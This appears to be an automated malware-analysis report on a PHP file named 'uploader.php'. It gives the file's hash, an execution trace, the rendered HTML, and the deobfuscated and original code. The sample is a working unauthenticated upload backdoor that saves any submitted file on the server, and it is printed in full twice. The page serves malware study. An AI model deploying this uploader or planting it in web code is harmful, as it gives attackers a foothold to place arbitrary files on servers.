PHP Malware Analysis

uploader.php

md5: 7a3aa497f5e93f8e7a7a8f42ad3f0821

Jump to:

Screenshot


Attributes

Files

Input

Title

URLs


Deobfuscated PHP code

http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Avinash Kumar Thapa</title>
</head>
<body bgcolor="white">
<?php 
$uploaddir = '/tmp/';
// Change the directory as per the requirement
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    print "<body bgcolor=#000></br></br><div\n\nalign=center><font size=5 color=#ff0000>uploaded successfully</font></body>";
} else {
    print "<body\n\nbgcolor=#000></br></br><div align=center><font size=5 color=#ff0000Error !\n</font> <marquee> Acid </marquee> </body>";
}
?>
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>

Execution traces

data/traces/7a3aa497f5e93f8e7a7a8f42ad3f0821_trace-1676248604.9709.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:37:10.868756]
1	0	1	0.000196	393528
1	3	0	0.000276	396472	{main}	1		/var/www/html/uploads/uploader.php	0	0
1		A						/var/www/html/uploads/uploader.php	9	$uploaddir = '/tmp/'
2	4	0	0.000349	396472	basename	0		/var/www/html/uploads/uploader.php	10	1	NULL
2	4	1	0.000370	396536
2	4	R			''
1		A						/var/www/html/uploads/uploader.php	10	$uploadfile = '/tmp/'
2	5	0	0.000415	396472	move_uploaded_file	0		/var/www/html/uploads/uploader.php	11	2	NULL	'/tmp/'
2	5	1	0.000435	396544
2	5	R			FALSE
1	3	1	0.000455	396472
			0.000488	314352
TRACE END   [2023-02-12 22:37:10.869087]


Generated HTML code

<html xmlns="http://www.w3.org/1999/xhtml"><head></head><body bgcolor="white">http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;


<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Avinash Kumar Thapa</title>


<br><br><div align="center"><font size="5" color="#ff0000Error" !="" <="" font=""> <marquee> Acid </marquee> <div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file">&nbsp;
<input type="submit" value="Upload">
</form>
</div>


</font></div></body></html>

Original PHP code

http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Avinash Kumar Thapa</title>
</head>
<body bgcolor="white">
<?php
$uploaddir = '/tmp/'; // Change the directory as per the requirement
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div

align=center><font size=5 color=#ff0000>uploaded successfully</font></body>';
} else { print '<body

bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000Error !
</font> <marquee> Acid </marquee> </body>'; }
?>
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>